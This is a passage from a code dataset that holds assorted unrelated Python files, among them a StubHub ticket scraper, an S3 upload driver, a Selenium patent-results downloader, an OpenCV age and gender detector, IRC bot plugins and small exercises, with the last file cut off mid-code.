ticketInfo.apply(pd.Series)\n # Remove unnecessary dictionary-like fields from dataframe\n events_ticket_summary = events_ticket_summary.loc[:, events_ticket_summary.columns.str.find('With') == -1]\n # Add date\n events_ticket_summary['date'] = self.scrape_date\n\n # Generate venues DataFrame\n events_df.apply(lambda x: x['venue'].update({'dt_accessed': x['dt_accessed']}), axis=1)\n venues = events_df.venue.apply(pd.Series)\n venues = venues.drop_duplicates(subset = 'id')\n venues = venues.rename(index=str, columns={'id': 'venue_id'})\n venues = venues.drop(['webURI', 'seoURI', 'venueUrl', 'venueConfigId'],\n axis=1, errors='ignore')\n\n # Label events dataframe with venue id\n events_df['venue_id'] = events_df.venue.apply(lambda i: i['id'])\n\n # Get name of venue configuration\n events_df['venue_config'] = events_df.venueConfiguration.apply(lambda x: x['name'])\n\n # Tag events df with date\n events_df['date'] = self.scrape_date\n\n # Drop unwanted columns\n events_df = events_df.drop(['ancestors', 'associatedEvents', 'attributes', 'bobId',\n 'catalogTemplate', 'categories', 'categoriesCollection', 'defaultLocale',\n 'displayAttributes','eventAttributes', 'groupings',\n 'groupingsCollection', 'imageUrl', 'images', 'locale',\n 'mobileAttributes', 'performers', 'performersCollection', 'score',\n 'seoURI', 'webURI',\n 'sourceId', 'status', 'ticketInfo','venue', 'venueConfiguration'],\n axis = 1, errors = 'ignore')\n\n events_df = events_df.rename(index=str, columns={'id': 'event_id'})\n\n # Save events dataframes\n self.events = {'events_df': events_df, 'events_perf': events_perf,\n 'events_scores': events_scores,\n 'events_ticket_summary': events_ticket_summary,\n 'venues_df': venues}\n\n print('Events parsed!')\n\n # End-to-end wrapper to generate a list of events\n def get_events(self):\n\n if not self._events_raw:\n self._get_events_raw()\n\n self._parse_events()\n\n print('We have events!')\n\n\n\n\n # Method to gather ticket inventory (json objects)\n def _get_inventory(self):\n self._verify_or_gen_auth_()\n\n # Get events if we have not yet\n if not self.events:\n self.get_events()\n\n print('Getting inventory.')\n\n # Get a list of event IDs that have available tickets\n events_l = self.events['events_ticket_summary']\n events_l = events_l.loc[events_l['totalListings']>0, ['event_id', 'totalListings']]\n events_l = events_l.reset_index(drop=True)\n print(events_l.head())\n\n # Save inventory URL\n inventory_url = 'https://api.stubhub.com/search/inventory/v2'\n\n # Initialize empty inventory list\n inventory = []\n\n # Only keep first n listings if we're in test mode\n if self.__test_mode:\n n = 3 # First n listings for testing\n events_l = events_l.iloc[0:n, :]\n\n # Loop through each event and get ticket listings\n for i, id, n_tickets in events_l.itertuples():\n\n print('Getting ticket inventory event {} out of {}'.format(i + 1, len(events_l)))\n\n # Initialize parameters and blank inventory list\n params = {'eventid': id, 'start': 0, 'rows': 250,\n 'fieldsList': '*,faceValue,listingAttributeList'}\n\n # Continue looping until we've gotten all of the listings\n while params['start'] <= n_tickets:\n\n # Use a try statement because sometimes the last listing\n # might be sold before we make the inventory query\n try:\n\n # Query for tickets\n inventory_r = requests.get(inventory_url, headers=self.__headers,\n params=params).json()['listing']\n\n # Add the event id to each ticket\n list(map(lambda i: i.update({'event_id': id,\n 'dt_accessed': str(datetime.datetime.now())}),\n 
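# update() mutates each listing dict in place here, tagging it with its event id and an access timestamp\n                         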
inventory_r))\n\n                    # Add responses to the inventory list\n                    inventory.extend(inventory_r)\n\n                except:\n                    pass\n\n                # Advance by one page; the step must match the 'rows' page size\n                params['start'] += params['rows']\n\n                # Take a rest!\n                sleep(self.__sleep_time)\n\n        # Save inventory to raw listings object\n        self._inventory_raw = inventory\n\n\n\n    # Method to parse existing ticket inventory\n    def _parse_inventory(self):\n\n        # Make a dataframe out of listings; drop duplicates\n        tickets_df = pd.DataFrame(self._inventory_raw)\n        tickets_df = tickets_df.drop_duplicates(subset='listingId')\n\n        # Convert price dictionaries into columns\n        tickets_df['price_curr'] = tickets_df.currentPrice.apply(lambda x: x['amount'])\n        tickets_df['currency_curr'] = tickets_df.currentPrice.apply(lambda x: x['currency'])\n        tickets_df['price_list'] = tickets_df.listingPrice.apply(lambda x: x['amount'])\n        tickets_df['currency_list'] = tickets_df.listingPrice.apply(lambda x: x['currency'])\n\n        # Generate delivery type df\n        tickets_deliv_type = tickets_df.set_index('listingId')['deliveryTypeList'].\\\n            apply(pd.Series).stack().reset_index()\n        tickets_deliv_type = tickets_deliv_type.drop('level_1', axis=1)\n        tickets_deliv_type = tickets_deliv_type.rename(index=str, columns={0: \"listings_deliv_type\"})\n        tickets_deliv_type = tickets_deliv_type.merge(tickets_df[['listingId', 'dt_accessed']], on='listingId')\n        tickets_deliv_type['date'] = self.scrape_date\n\n\n        # Generate delivery method df\n        tickets_deliv_method = tickets_df.set_index('listingId')['deliveryMethodList'].\\\n            apply(pd.Series).stack().reset_index()\n        tickets_deliv_method = tickets_deliv_method.drop('level_1', axis=1)\n        tickets_deliv_method = tickets_deliv_method.rename(index=str, columns={0: \"listings_deliv_method\"})\n        tickets_deliv_method = tickets_deliv_method.merge(tickets_df[['listingId', 'dt_accessed']], on='listingId')\n        tickets_deliv_method['date'] = self.scrape_date\n\n\n        # Get face value from dict\n        ## Use try except because sometimes we don't get face value\n        try:\n            tickets_df['faceValue'] = tickets_df.faceValue.apply(lambda x: np.NaN if pd.isnull(x)\n                                                                 else x['amount'])\n        except:\n            tickets_df['faceValue'] = np.NaN\n\n        # Generate listing attribute df\n        ## Use a try statement because sometimes we don't get the listing attr list back from the API\n        try:\n            tickets_listing_attr = tickets_df.set_index('listingId')['listingAttributeList'].\\\n                apply(pd.Series).stack().reset_index()\n            tickets_listing_attr = tickets_listing_attr.drop('level_1', axis=1)\n            tickets_listing_attr = tickets_listing_attr.rename(index=str, columns={0: \"listings_listing_attr\"})\n        except:\n            tickets_listing_attr = 'none'\n\n        # Get ticket price from dict\n        tickets_df['listingPrice'] = tickets_df.listingPrice.apply(lambda x: x['amount'])\n\n        # Generate ticket splits df\n        tickets_splits_df = tickets_df.set_index('listingId')['splitVector'].\\\n            apply(pd.Series).stack().reset_index()\n        tickets_splits_df = tickets_splits_df.drop('level_1', axis=1)\n        tickets_splits_df = tickets_splits_df.rename(index=str, columns={0: \"tickets_splits_option\"})\n        tickets_splits_df['date'] = self.scrape_date\n        tickets_splits_df = tickets_splits_df.merge(tickets_df[['listingId', 'dt_accessed']], on='listingId')\n\n        # Add date\n        tickets_df['date'] = self.scrape_date\n\n        # Drop unwanted columns\n        tickets_df = tickets_df.drop(['businessGuid', 'currentPrice', 'deliveryMethodList',\n                                      'deliveryTypeList', 'listingAttributeList', 'listingAttributeCategoryList',\n                                      'sellerOwnInd', 'splitVector'],\n                                     axis = 1, errors = 'ignore')\n\n        # Save ticket 
dataframes\n self.tickets = {'tickets_df': tickets_df,\n 'tickets_deliv_type': tickets_deliv_type,\n 'tickets_deliv_method': tickets_deliv_method,\n 'tickets_listing_attr': tickets_listing_attr,\n 'tickets_splits': tickets_splits_df}\n\n\n\n # Wrapper for end-to-end ticket gathering\n def get_tickets(self):\n\n # Get ticket inventory if we have not yet\n if not self._inventory_raw:\n self._get_inventory()\n\n # Parse inventory\n self._parse_inventory()\n\n print('Success!')\n","sub_path":"StubHub/stubhub_scraper.py","file_name":"stubhub_scraper.py","file_ext":"py","file_size_in_byte":17767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"547156950","text":"n = int(input())\r\n\r\nparking = set()\r\nfor _ in range(n):\r\n direction, reg_num = input().split(', ')\r\n if direction == 'IN':\r\n parking.add(reg_num)\r\n elif direction == 'OUT':\r\n parking.remove(reg_num)\r\nif parking:\r\n print('\\n'.join(parking))\r\nelse:\r\n print('Parking Lot is Empty')","sub_path":"Python Advanced 2021/TUPLES AND SETS/Lab 04 - ver 2.py","file_name":"Lab 04 - ver 2.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"31600274","text":"\nfrom masonite.contracts.UploadContract import UploadContract\nfrom masonite.drivers.BaseUploadDriver import BaseUploadDriver\nfrom masonite.exceptions import DriverLibraryNotFound\n\n\nclass UploadS3Driver(BaseUploadDriver, UploadContract):\n \"\"\"\n Amazon S3 Upload driver\n \"\"\"\n\n def __init__(self, UploadManager, StorageConfig):\n self.upload = UploadManager\n self.config = StorageConfig\n\n def store(self, fileitem, location=None):\n driver = self.upload.driver('disk')\n driver.store(fileitem, location)\n file_location = driver.file_location\n\n # Check if is a valid extension\n self.validate_extension(fileitem.filename)\n\n try:\n import boto3\n except ImportError:\n raise DriverLibraryNotFound(\n 'Could not find the \"boto3\" library. 
Please pip install this library by running \"pip install boto3\"')\n\n        session = boto3.Session(\n            aws_access_key_id=self.config.DRIVERS['s3']['client'],\n            aws_secret_access_key=self.config.DRIVERS['s3']['secret'],\n        )\n\n        s3 = session.resource('s3')\n\n        s3.meta.client.upload_file(\n            file_location,\n            self.config.DRIVERS['s3']['bucket'],\n            fileitem.filename\n        )\n\n        return fileitem.filename\n\n    def store_prepend(self, fileitem, prepend, location=None):\n        fileitem.filename = prepend + fileitem.filename\n\n        return self.store(fileitem, location=location)\n","sub_path":"python/egghead.io/Quick Lessons/venv/lib/python3.6/site-packages/masonite/drivers/UploadS3Driver.py","file_name":"UploadS3Driver.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"492786153","text":"from time import sleep\nfrom selenium import webdriver\n\ndownload_path = './'\n\n# Crawler setup\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\n\n# Options that allow file downloads in headless mode\nchrome_options.add_experimental_option(\"prefs\", {\n    \"download.default_directory\": download_path,\n    'download.prompt_for_download':False,\n    'download.directory_upgrade':True,\n    'safebrowsing.enabled':False,\n    'safebrowsing.disable_download_protection':True\n})\n\n#driver = webdriver.Chrome(executable_path='./chromedriver',chrome_options=chrome_options)\ndriver = webdriver.Chrome(executable_path='/usr/local/bin/chromedriver',chrome_options=chrome_options)\ndriver.implicitly_wait(3)\nurl = 'http://kpat.kipris.or.kr/kpat/searchLogina.do?next=MainSearch#page1'\ndriver.get(url)\n\n# Run the DevTools command that enables downloads, which headless mode does not allow by default\ndriver.command_executor._commands[\"send_command\"] = (\"POST\",'/session/$sessionId/chromium/send_command')\nparams = {'cmd':'Page.setDownloadBehavior','params': {'behavior': 'allow','downloadPath': download_path}}\ncommand_result = driver.execute(\"send_command\",params)\n\nsearch = driver.find_element_by_xpath('//input[@title=\"검색어입력\"]')\nsearch.send_keys(\"롯데정보통신\")\ndriver.find_element_by_xpath('//*[@id=\"SearchPara\"]/fieldset/span[1]').click()\nsleep(5)\n\n# Elements that ignore .click() have to be triggered through JavaScript, as below\ndownloadBtn = driver.find_element_by_xpath(\"//span[@class='icon_exl']//a\")\ndriver.execute_script(\"arguments[0].click();\",downloadBtn)\nsleep(3)\ndriver.close() \n\n","sub_path":"source/dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"239608245","text":"from ClientPlayer import ClientPlayer\nfrom Server import Server\nfrom multiprocessing import Process\nfrom tkinter import messagebox, simpledialog\nimport tkinter\nimport sys\n\nif __name__ == \"__main__\":\n    NUM_PORT = 8003\n    ip = '192.168.43.208'\n    nb_player = 0\n\n    root = tkinter.Tk() # initialize an interface for the choice dialogs\n    windowWidth = root.winfo_reqwidth() # Center this interface on the screen\n    windowHeight = root.winfo_reqheight()\n    positionRight = int(root.winfo_screenwidth() / 2 - windowWidth / 2)\n    positionDown = int(root.winfo_screenheight() / 2 - windowHeight / 2)\n    root.geometry(\"+{}+{}\".format(positionRight, positionDown))\n    root.withdraw() # Remove the \"ghost\" window behind the popups\n\n    is_server = messagebox.askyesno(\"Freak out !\", \"Voulez-vous être le serveur de jeu ?\")\n    if is_server:\n        ip = simpledialog.askstring(\"Freak out !\", \"Quelle est votre IP à utiliser ?\", 
initialvalue=ip)\n        while nb_player < 1 or nb_player > 3:\n            nb_player = simpledialog.askinteger(\"Freak out !\", \"Combien de joueurs ? (entre 1 et 3)\", initialvalue=1)\n        nickname = simpledialog.askstring(\"Freak out !\", \"Quel est votre pseudo ?\", initialvalue='Toto')\n        server_process = Process(target=Server, args=(nb_player, ip, NUM_PORT)) # create the server process\n        client_process = Process(target=ClientPlayer, args=(nickname, ip, NUM_PORT)) # create a client process\n        server_process.start() # start the processes\n        client_process.start()\n        client_process.join() # wait for the processes to finish\n        server_process.join()\n    else:\n        ip = simpledialog.askstring(\"Freak out !\", \"A quelle adresse IP se connecter ?\", initialvalue=ip)\n        nickname = simpledialog.askstring(\"Freak out !\", \"Quel est votre pseudo ?\")\n        client_process = Process(target=ClientPlayer, args=(nickname, ip, NUM_PORT))\n        client_process.start()\n        client_process.join()\n    print(\"Arrêt du programme principal.\")\n    sys.exit()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"137327282","text":"class Solution(object):\n    def minArea(self, image, x, y):\n        \"\"\"\n        :type image: List[List[str]]\n        :type x: int\n        :type y: int\n        :rtype: int\n        \"\"\"\n        image[x][y] = '2';\n        xRange = [x, x];\n        yRange = [y, y];\n        start = [[x, y]];\n        \n        \n        \n        # fill def\n        def fill(image, xRange, yRange, start):\n            st = [];\n            for s in start:\n                if s[0] > 0 and image[s[0]-1][s[1]] == '1':\n                    image[s[0]-1][s[1]] = '2';\n                    st += [[s[0]-1, s[1]]];\n                    xRange[0] = min(xRange[0], s[0]-1);\n                    \n                if s[0] < len(image)-1 and image[s[0]+1][s[1]] == '1':\n                    image[s[0]+1][s[1]] = '2';\n                    st += [[s[0]+1, s[1]]];\n                    xRange[1] = max(xRange[1], s[0]+1);\n                    \n                if s[1] > 0 and image[s[0]][s[1]-1] == '1':\n                    image[s[0]][s[1]-1] = '2';\n                    st += [[s[0], s[1]-1]];\n                    yRange[0] = min(yRange[0], s[1]-1);\n                    \n                if s[1] < len(image[0])-1 and image[s[0]][s[1]+1] == '1':\n                    image[s[0]][s[1]+1] = '2';\n                    st += [[s[0], s[1]+1]];\n                    yRange[1] = max(yRange[1], s[1]+1);\n                    \n            if len(st): fill(image, xRange, yRange, st);\n        \n        fill(image, xRange, yRange, start);\n        return (xRange[1]-xRange[0]+1) * (yRange[1]-yRange[0]+1);\n    # pass at 1:!2","sub_path":"301-400/301-310/py/302_smallest_rectangle.py","file_name":"302_smallest_rectangle.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"487803533","text":"import random\nimport math \n\n'''A = []\nB = []\nM = int(input(\"Enter number of elements: \"))\nfor i in range(M):\n    A.append(random.randrange(-10, 10, 1))\nprint(A)\n\n\nfor i in range(M):\n    B.append(A[i])\n    if A[i] < 0:\n        A[i] = pow(A[i], 2)\n        B.append(A[i])\nA = B\nprint(A)'''\n\nA = []\nM = int(input(\"Enter number of elements: \"))\nfor i in range(M):\n    A.append(random.randrange(-10, 20, 1))\nprint(A)\nfor j in range(0,M,2):\n    if A[j] == 0:\n        print(j)\n        \n        \n\n\n","sub_path":"SomeTasks/secondLab.py","file_name":"secondLab.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"75052874","text":"\n\nimport portion as Interval\n\nfrom django.db.models import Q\nfrom ..models import Guide, GuidableTime, Reservation\n\n# class GuidabTimeIntval:\n\ndef prelim_cand_interval(guidable_time_obj,\n                         request_time_from, request_time_to):\n\n    already_reservs = 
Reservation.objects.filter(\n        Q(guidable_time__guide = guidable_time_obj.guide,\n          reservation_time_from__gte = request_time_from,\n          reservation_time_from__lt = request_time_to,\n          ) |\n        Q(guidable_time__guide = guidable_time_obj.guide,\n          reservation_time_to__gte = request_time_from,\n          reservation_time_to__lt = request_time_to,\n          )).distinct()\n\n    guide_intval = Interval.open(guidable_time_obj.guidable_time_from,\n                                 guidable_time_obj.guidable_time_to)\n    request_intval = Interval.open(request_time_from,\n                                   request_time_to)\n    cand_intval = guide_intval & request_intval\n\n    return already_reservs, cand_intval\n\ndef extract_guidable_time_intervals(guidable_time_obj,\n                                    request_time_from, request_time_to):\n\n    already_reservs, cand_intvals = prelim_cand_interval(guidable_time_obj,\n                                                         request_time_from,\n                                                         request_time_to)\n\n    for already_reserv in already_reservs:\n        already_reserv_intval = Interval.open(already_reserv.reservation_time_from,\n                                              already_reserv.reservation_time_to)\n        cand_intvals -= already_reserv_intval\n\n    if cand_intvals.empty:\n        return []\n    else:\n        return [ cand_intval for cand_intval in list(cand_intvals)\n                 if cand_intval.upper > cand_intval.lower ]\n\ndef check_avail_full_interval(guidable_time_obj,\n                              request_time_from, request_time_to):\n\n    already_reservs, cand_intvals = prelim_cand_interval(guidable_time_obj,\n                                                         request_time_from,\n                                                         request_time_to)\n\n    req_intval = Interval.open(request_time_from, request_time_to)\n\n    remain_intval = req_intval\n\n    for already_reserv in already_reservs:\n        # print(remain_intval, already_reserv)\n        remain_intval -= Interval.open(already_reserv.reservation_time_from,\n                                       already_reserv.reservation_time_to)\n        # print(\"--->\", remain_intval)\n\n    return remain_intval == req_intval\n\n","sub_path":"appGuide/modules/search_guidable_time_intervals1_1.py","file_name":"search_guidable_time_intervals1_1.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"385842928","text":"import cv2\nimport pafy\nimport numpy as np\n\npath_classifier = './premodels/haarcascade_frontalface_default.xml'\n# Load the cascade once, from the premodels directory\nface_cascade = cv2.CascadeClassifier(path_classifier)\n\n## Get user option\nprint('Input video URL to analyse or 0 to use webcam')\ninp = input()\nif inp == '0':\n    inp = int(inp)\nelse:\n    vPafy = pafy.new(inp)\n    play = vPafy.getbest(preftype='mp4')\n    inp = play.url\n    \ncap = cv2.VideoCapture(inp)\n\n## Fixed Values\nMODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)\nage_list = ['(0, 2)', '(4, 6)', '(8, 12)', '(15, 20)', '(25, 32)', '(38, 43)', '(48, 53)', '(60, 100)']\ngender_list = ['Male', 'Female']\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n## LOAD CAFFE MODELS\nage_net = cv2.dnn.readNetFromCaffe('./premodels/deploy_age.prototxt', './premodels/age_net.caffemodel')\ngender_net = cv2.dnn.readNetFromCaffe('./premodels/deploy_gender.prototxt', './premodels/gender_net.caffemodel')\n\n\n\nwhile True:\n    _, img = cap.read()\n    #if not hasFrame & inp!=0:\n    #    cv2.waitKey()\n    #    break\n    \n    # Convert to grayscale\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    # Detect the faces\n    faces = face_cascade.detectMultiScale(gray, 1.1, 5)\n    \n    \n    # Draw the rectangle around each face\n    for (x, y, w, h) in faces:\n        cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n        # Get Face\n        face_img = img[y:y+h, x:x+w].copy()\n        blob = cv2.dnn.blobFromImage(face_img, 1, (227,227), 
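# 227x227 is the input size these Caffe age/gender nets expect; the mean BGR values passed next are subtracted per channel before the forward pass\n                                     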
MODEL_MEAN_VALUES, swapRB=False)\n \n print(face_img)\n \n # Predict Age\n age_net.setInput(blob)\n age_preds = age_net.forward()\n age = age_list[age_preds[0].argmax()]\n \n # Predict Gender\n gender_net.setInput(blob)\n gender_preds = gender_net.forward()\n gender = gender_list[gender_preds[0].argmax()]\n \n \n ## Display age and gender\n \n overlay_text = \"%s %s\" % (gender,age)\n cv2.putText(img, overlay_text, (x,y),font,1,(255,255,255), 2, cv2.LINE_AA)\n \n \n ## Display\n cv2.imshow('img', img)\n # Stop if escape key is pressed\n k = cv2.waitKey(30) & 0xff\n if k==27:\n break\n# Release the VideoCapture object\ncap.release()","sub_path":".ipynb_checkpoints/video-checkpoint.py","file_name":"video-checkpoint.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"358412231","text":"'''\nCreated on Sep 19, 2014\n\n@author: starchmd\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\nimport shelve\nimport atexit\n'''\nContains the standard plugins created by Tyler et. al.\n Parrot - Standard responses to standard command.\n Padiwan - Allows learning of new parrot commands.\n Help - Sends the help.\n'''\nclass ParrotPlugin(object):\n '''\n Repeats specific responses for specific inputs.\n '''\n def __init__(self, conn):\n # Map from keywords to how the bot will respond in chat.\n self.conn = conn\n self.responces = {\n \"ack\": \"ack\",\n \"git\": \"#gitpush\",\n \"aye\": \"aye, mate!\",\n \"+1\": \"+1\",\n \"boom\": \"kaboom!!!\",\n \"beum\": \"kabeum!!!\",\n \"bewm\": \"ba-bewm!!!\",\n \"seen\": \"seen like an eaten jelly bean\"}\n \n def run(self,user,message):\n ''' Responds to input '''\n #Don't spam on commands\n if self.conn.isPersonal(message):\n return\n for key in self.responces:\n if key in message:\n self.conn.send((self.responces[key] + \" \") * message.count(key, 0))\n def list(self):\n '''Reports default commands.'''\n return {\"Default Commands: \":self.responces.keys()}\n \nclass Padiwan(ParrotPlugin):\n def __init__(self,conn):\n ''' Init '''\n super(Padiwan,self).__init__(conn)\n self.defaults = self.responces\n self.authors = {}\n self.responces = shelve.open(\"autoack.shelf\")\n atexit.register(self.responces.close)\n def learn(self,cmd,response, user):\n ''' Learn a command '''\n if cmd not in self.defaults:\n self.conn.send((\"Relearned\" if cmd in self.responces else \"Learned\")+ \" \"+cmd)\n self.responces[cmd] = \" \".join(response)\n self.authors[cmd] = user\n else:\n self.conn.send(\"Go away, \" + user + \"!\")\n def forget(self,cmd):\n ''' Forget a command '''\n if cmd in self.defaults:\n self.conn.send(\"No.\")\n elif cmd in self.responces:\n self.responces.pop(cmd) \n self.conn.send(\"Dropped like a bad habit.\")\n else:\n self.conn.send(\"Maybe you're the one forgetting...\")\n \n def run(self,user,message):\n '''Runs a command'''\n cmd = self.conn.getCommand(message)\n args = self.conn.getArgs(message)\n if cmd == \"learn\" and len(args) >= 2:\n 
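# e.g. 'learn boom kaboom!!!' stores the key 'boom' with the response 'kaboom!!!'\n            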
self.learn(args[0],args[1:],user)\n elif cmd == \"forget\" and len(args) == 1:\n self.forget(args[0])\n elif cmd == \"blame\" and len(args) == 1:\n self.conn.send(args[0] + \" was created by \" + self.authors[args[0]], user)\n elif cmd == \"learn\" or cmd == \"forget\" or cmd == \"blame\":\n self.conn.send(\"Incomplete command.\",user)\n else:\n super(Padiwan,self).run(user,message)\n def list(self):\n '''Reports learned commands.'''\n return {\"Learned Commands: \":self.responces.keys()} \n\nclass Help(object):\n def __init__(self,conn):\n '''Initialize yo'''\n self.conn = conn\n def list(self):\n ''' Do nothing '''\n pass\n def run(self,user,message):\n ''' Check for help, and print help. '''\n cmd = self.conn.getCommand(message)\n if cmd == \"help\":\n nick = self.conn.getNick()\n self.conn.send(\"Available commands:\")\n self.conn.send(\" \" + nick + \": autotweet (monitor the defined twitter account and AutoAck Tweets)\")\n self.conn.send(\" \" + nick + \": blame [key] (show user who created [key])\")\n self.conn.send(\" \" + nick + \": forget [key] (forget user learned keyword [key])\")\n self.conn.send(\" \" + nick + \": help (print this help message)\") \n self.conn.send(\" \" + nick + \": learn [key] [value] (learn to say [value] after [key])\")\n self.conn.send(\" \" + nick + \": list (print list of available keywords)\")\n self.conn.send(\" \" + nick + \": quiet [seconds] (don't talk for optional number of [seconds])\")\n self.conn.send(\" \" + nick + \": speak (override a previous quiet command)\")\n self.conn.send(\" \" + nick + \": tweet (send a tweet to the defined twitter account)\") \n ","sub_path":"plugins/standard.py","file_name":"standard.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"113781372","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup as bs\n\nhtml_page = urlopen('https://francechansons.net/alain-souchon-liste-de-chansons/')\nsoup = bs(html_page, 'lxml')\n\nentry_content_div=soup.find(\"div\", class_=\"entry-content\")\nul = entry_content_div.find(\"ul\").find_all_next('li')\nfor link in ul:\n url = link.find_next('a')['href']\n # ('a')['href']\n if 'francechansons' not in url:\n print(\"https://francechansons.net/\"+url)\n else:\n print(url)\n# print('liesssssss', ul)\n# li = ul.find('li')\n# children = ul.findChildren(\"a\")\n# for child in children:\n# print(child)\n# print(\"https://francechansons.net/\" + child['href'])\n","sub_path":"scrapy_projt/soup_scrapy/b_soup_france.py","file_name":"b_soup_france.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"560849041","text":"import tensorflow as tf\n\nimport tf_util as U\n\n\nclass Model:\n\tdef __init__(self, loss = \"weighted\"):\n\t\tself.loss = loss\n\t\tself.prob = tf.placeholder(shape = (), dtype = tf.float32)\n\t\tself.lr = tf.placeholder(shape = (), dtype = tf.float32)\n\t\tself.n_patches = 64\n\t\tself.output = self.loss_op = self.train_op = None\n\n\t@staticmethod\n\tdef block(net, filters):\n\t\twith tf.variable_scope('block_' + str(filters)):\n\t\t\tnet = U.conv2d(net, filters, 'conv1', (3, 3))\n\t\t\tnet = U.swish(net)\n\t\t\tnet = U.conv2d(net, filters, 'conv2', (3, 3))\n\t\t\tnet = U.swish(net)\n\t\t\tnet = U.maxpool(net, 2)\n\t\treturn net\n\n\tdef build(self, image, mos_score):\n\t\tnet = tf.reshape(image, [-1, 32, 32, 3])\n\t\tnet = self.block(net, 32)\n\t\tnet = 
self.block(net, 64)\n\t\tnet = self.block(net, 128)\n\t\tnet = self.block(net, 256)\n\t\tnet = self.block(net, 512)\n\n\t\tnet1 = tf.reshape(net, (-1, 512))\n\t\tnet1 = U.dense(net1, 512, 'fc1')\n\t\tnet1 = U.swish(net1)\n\t\tnet1 = tf.nn.dropout(net1, keep_prob = self.prob)\n\t\tnet1 = U.dense(net1, 1, 'fc2')\n\n\t\tnet2 = tf.reshape(net, (-1, 512))\n\t\tnet2 = U.dense(net2, 512, 'fc1_weight')\n\t\tnet2 = U.swish(net2)\n\t\tnet2 = tf.nn.dropout(net2, keep_prob = self.prob)\n\t\tnet2 = U.dense(net2, 1, 'fc2_weight')\n\t\tnet2 = tf.nn.relu(net2) + 1e-6\n\n\t\tself.loss_op = self.weighted_loss(net1, net2, mos_score)\n\n\t\toptimizer = tf.train.AdamOptimizer(self.lr)\n\t\tself.train_op = optimizer.minimize(self.loss_op)\n\n\tdef weighted_loss(self, h, a, t):\n\t\tself.output = 0\n\n\t\th = tf.reshape(h, (-1, self.n_patches))\n\t\ta = tf.reshape(a, (-1, self.n_patches))\n\t\tha = tf.multiply(h, a)\n\t\tha_sum = tf.reduce_sum(ha, axis = 1)\n\t\ta_sum = tf.reduce_sum(a, axis = 1)\n\n\t\ty = tf.divide(ha_sum, a_sum)\n\t\tdiff = tf.abs(y - t)\n\t\tloss = tf.reduce_mean(diff)\n\t\treturn loss\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"223755949","text":"\"\"\"\r\nNewSucc\r\nLoads vocabulary from NewSucces, creates a Dictionary for each UNIT,\r\nputs all the units in a tuple\r\n\"\"\"\r\n\r\nsource = \"NewSucc_INT.txt\"\r\n\r\ndef create_dic(file):\r\n dic = {} #dictionary, one for each unit\r\n vocab = [] #list for all units\r\n doc = open(file, \"r\") #opens file\r\n prev_word = 0\r\n #dot = 44\r\n was_unit = False #was the previous line was the name of the unit\r\n prev_line = None #the whole previous line\r\n wordS = \"\" #the slovak word\r\n wordE = \"\" #the english word\r\n loading_slovak = False #should program load slovak word\r\n ignore_letter = False #should program ignore the current letter\r\n ignore_lines = 0 #how many lines should the program ignore\r\n \r\n def save_wordS(wordSk, wordEn, cut):\r\n \"\"\"\r\n wordSk- slovak word\r\n wordEn- translation of the slovak words\r\n cut- the word that is supposed to be be cut from the end of wordSk\r\n \"\"\"\r\n wordS = wordSk[2:]\r\n wordS = wordS[:wordS.find(cut)]\r\n wordS = wordS.strip()\r\n wordE = wordEn.strip()\r\n for i in range(2):\r\n if \"\\n\" in wordS:\r\n wordS = wordS.replace(\"\\n\", \" \")\r\n if \".\" in wordS:\r\n wordS = wordS[wordS.find(\".\")+3:]\r\n return wordE, wordS\r\n \r\n for line in doc: #loops through each line\r\n if \"NEW SUCCESS – INTERMEDIATE\" in line:\r\n ignore_lines = 2\r\n elif ignore_lines > 0:\r\n ignore_lines += -1\r\n elif line[0].isalpha():\r\n if \"UNIT\" in line:\r\n if \"UNIT 1\" not in line and len(line) == 7:\r\n saved_words = save_wordS(wordS, wordE, wordE)\r\n dic[saved_words[0]] = saved_words[1]\r\n wordS = \"\"\r\n loading_slovak = False\r\n was_unit = True\r\n vocab.append(dic)\r\n dic = {}\r\n else:\r\n for letter in range(len(line)):\r\n if line[letter] == \"]\":\r\n ignore_letter = False\r\n if line[letter] == \"[\":\r\n ignore_letter = True\r\n prev_wordE = wordE\r\n if \"phrv\" in 